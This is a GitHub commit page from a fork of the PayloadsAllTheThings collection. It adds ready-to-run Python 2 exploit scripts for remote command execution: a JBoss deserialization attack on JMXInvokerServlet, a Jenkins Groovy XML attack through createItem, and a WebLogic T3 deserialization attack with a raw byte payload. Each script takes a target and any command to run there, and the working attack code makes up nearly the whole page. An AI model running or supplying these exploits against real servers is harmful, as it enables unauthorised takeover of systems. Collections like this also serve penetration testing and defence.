forked from swisskyrepo/PayloadsAllTheThings
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere
- Loading branch information
1 parent
15fe340
commit af9abc6
Showing
7 changed files
with
383 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,61 @@ | ||
| #! /usr/bin/env python2 | ||
|
|
||
| # Jboss Java Deserialization RCE (CVE-2015-7501) | ||
| # Made with <3 by @byt3bl33d3r | ||
|
|
||
| import requests | ||
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | ||
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | ||
|
|
||
| import argparse | ||
| import sys, os | ||
| #from binascii import hexlify, unhexlify | ||
| from subprocess import check_output | ||
|
|
||
| ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] | ||
| ysoserial_path = None | ||
|
|
||
| parser = argparse.ArgumentParser() | ||
| parser.add_argument('target', type=str, help='Target IP') | ||
| parser.add_argument('command', type=str, help='Command to run on target') | ||
| parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') | ||
| parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') | ||
|
|
||
| if len(sys.argv) < 2: | ||
| parser.print_help() | ||
| sys.exit(1) | ||
|
|
||
| args = parser.parse_args() | ||
|
|
||
| if not args.ysoserial_path: | ||
| for path in ysoserial_default_paths: | ||
| if os.path.exists(path): | ||
| ysoserial_path = path | ||
| else: | ||
| if os.path.exists(args.ysoserial_path): | ||
| ysoserial_path = args.ysoserial_path | ||
|
|
||
| if ysoserial_path is None: | ||
| print '[-] Could not find ysoserial JAR file' | ||
| sys.exit(1) | ||
|
|
||
| if len(args.target.split(":")) != 2: | ||
| print '[-] Target must be in format IP:PORT' | ||
| sys.exit(1) | ||
|
|
||
| if not args.command: | ||
| print '[-] You must specify a command to run' | ||
| sys.exit(1) | ||
|
|
||
| ip, port = args.target.split(':') | ||
|
|
||
| print '[*] Target IP: {}'.format(ip) | ||
| print '[*] Target PORT: {}'.format(port) | ||
|
|
||
| gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) | ||
|
|
||
| r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget) | ||
|
|
||
| if r.status_code == 200: | ||
| print '[+] Command executed successfully' | ||
|
|
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,83 @@ | ||
| #! /usr/bin/env python2 | ||
|
|
||
| #Jenkins Groovy XML RCE (CVE-2016-0792) | ||
| #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins | ||
| #Made with <3 by @byt3bl33d3r | ||
|
|
||
| import requests | ||
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | ||
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | ||
|
|
||
| import argparse | ||
| import sys | ||
|
|
||
| parser = argparse.ArgumentParser() | ||
| parser.add_argument('target', type=str, help='Target IP:PORT') | ||
| parser.add_argument('command', type=str, help='Command to run on target') | ||
| parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') | ||
|
|
||
| if len(sys.argv) < 2: | ||
| parser.print_help() | ||
| sys.exit(1) | ||
|
|
||
| args = parser.parse_args() | ||
|
|
||
| if len(args.target.split(':')) != 2: | ||
| print '[-] Target must be in format IP:PORT' | ||
| sys.exit(1) | ||
|
|
||
| if not args.command: | ||
| print '[-] You must specify a command to run' | ||
| sys.exit(1) | ||
|
|
||
| ip, port = args.target.split(':') | ||
|
|
||
| print '[*] Target IP: {}'.format(ip) | ||
| print '[*] Target PORT: {}'.format(port) | ||
|
|
||
| xml_formatted = '' | ||
| command_list = args.command.split() | ||
| for cmd in command_list: | ||
| xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd) | ||
|
|
||
| xml_payload = '''<map> | ||
| <entry> | ||
| <groovy.util.Expando> | ||
| <expandoProperties> | ||
| <entry> | ||
| <string>hashCode</string> | ||
| <org.codehaus.groovy.runtime.MethodClosure> | ||
| <delegate class="groovy.util.Expando" reference="../../../.."/> | ||
| <owner class="java.lang.ProcessBuilder"> | ||
| <command> | ||
| {} | ||
| </command> | ||
| <redirectErrorStream>false</redirectErrorStream> | ||
| </owner> | ||
| <resolveStrategy>0</resolveStrategy> | ||
| <directive>0</directive> | ||
| <parameterTypes/> | ||
| <maximumNumberOfParameters>0</maximumNumberOfParameters> | ||
| <method>start</method> | ||
| </org.codehaus.groovy.runtime.MethodClosure> | ||
| </entry> | ||
| </expandoProperties> | ||
| </groovy.util.Expando> | ||
| <int>1</int> | ||
| </entry> | ||
| </map>'''.format(xml_formatted.strip()) | ||
|
|
||
| print '[*] Generated XML payload:' | ||
| print xml_payload | ||
|
|
||
| print '[*] Sending payload' | ||
| headers = {'Content-Type': 'text/xml'} | ||
| r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) | ||
|
|
||
| paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] | ||
| if r.status_code == 500: | ||
| for path in paths_in_trace: | ||
| if path in r.text: | ||
| print '[+] Command executed successfully' | ||
| break |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,71 @@ | ||
| #!/usr/bin/env python2 | ||
|
|
||
| #Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510) | ||
| #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) | ||
| #Made with <3 by @byt3bl33d3r | ||
|
|
||
| import socket | ||
| import struct | ||
| import argparse | ||
| import os | ||
| import sys | ||
| from subprocess import check_output | ||
|
|
||
| ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] | ||
| ysoserial_path = None | ||
|
|
||
| parser = argparse.ArgumentParser() | ||
| parser.add_argument('target', type=str, help='Target IP:PORT') | ||
| parser.add_argument('command', type=str, help='Command to run on target') | ||
| parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') | ||
|
|
||
| if len(sys.argv) < 2: | ||
| parser.print_help() | ||
| sys.exit(1) | ||
|
|
||
| args = parser.parse_args() | ||
|
|
||
| if not args.ysoserial_path: | ||
| for path in ysoserial_default_paths: | ||
| if os.path.exists(path): | ||
| ysoserial_path = path | ||
| else: | ||
| if os.path.exists(args.ysoserial_path): | ||
| ysoserial_path = args.ysoserial_path | ||
|
|
||
| if len(args.target.split(':')) != 2: | ||
| print '[-] Target must be in format IP:PORT' | ||
| sys.exit(1) | ||
|
|
||
| if not args.command: | ||
| print '[-] You must specify a command to run' | ||
| sys.exit(1) | ||
|
|
||
| ip, port = args.target.split(':') | ||
|
|
||
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
|
|
||
| print '[*] Target IP: {}'.format(ip) | ||
| print '[*] Target PORT: {}'.format(port) | ||
|
|
||
| sock.connect((ip, int(port))) | ||
|
|
||
| # Send headers | ||
| headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' | ||
| print '[*] Sending header' | ||
| sock.sendall(headers) | ||
|
|
||
| data = sock.recv(1024) | ||
| print'[*] Received: "{}"'.format(data) | ||
|
|
||
| payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) | ||
|
|
||
| payload = '\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' | ||
| payload += payloadObj | ||
| payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' | ||
|
|
||
| # adjust header for appropriate message length | ||
| payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) | ||
|
|
||
| print '[*] Sending payload' | ||
| sock.send(payload) |
Oops, something went wrong.